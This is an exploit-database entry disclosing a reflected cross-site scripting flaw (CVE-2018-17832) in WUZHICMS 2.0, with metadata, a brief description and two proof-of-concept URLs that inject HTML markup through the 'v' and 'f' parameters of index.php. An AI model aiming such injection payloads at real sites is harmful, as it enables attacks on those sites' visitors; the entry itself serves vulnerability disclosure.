[] NeoSense

WUZHICMS 2.0 - Cross-Site Scripting

Author: Renzi
type: webapps
platform: php
port: 
date_added: 2018-10-01 
date_updated: 2018-10-03 
verified: 0 
codes: CVE-2018-17832 
tags: Cross-Site Scripting (XSS)
aliases:  
screenshot_url:  
application_url: 

# Title: WUZHICMS 2.0 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-10-01
# Vendor: http://www.wuzhicms.com
# Software: WUZHICMS 2.0
# CVE: CVE-2018-17832

# Technical Details & Description:
# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0  web-application.
# The vulnerability is located in the 'v' and  'f' parameters of the`index.php` action GET method request.

# PoC

http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>

http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>